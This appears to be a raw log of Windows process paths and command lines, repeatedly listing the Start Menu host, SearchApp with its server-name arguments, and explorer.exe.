"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
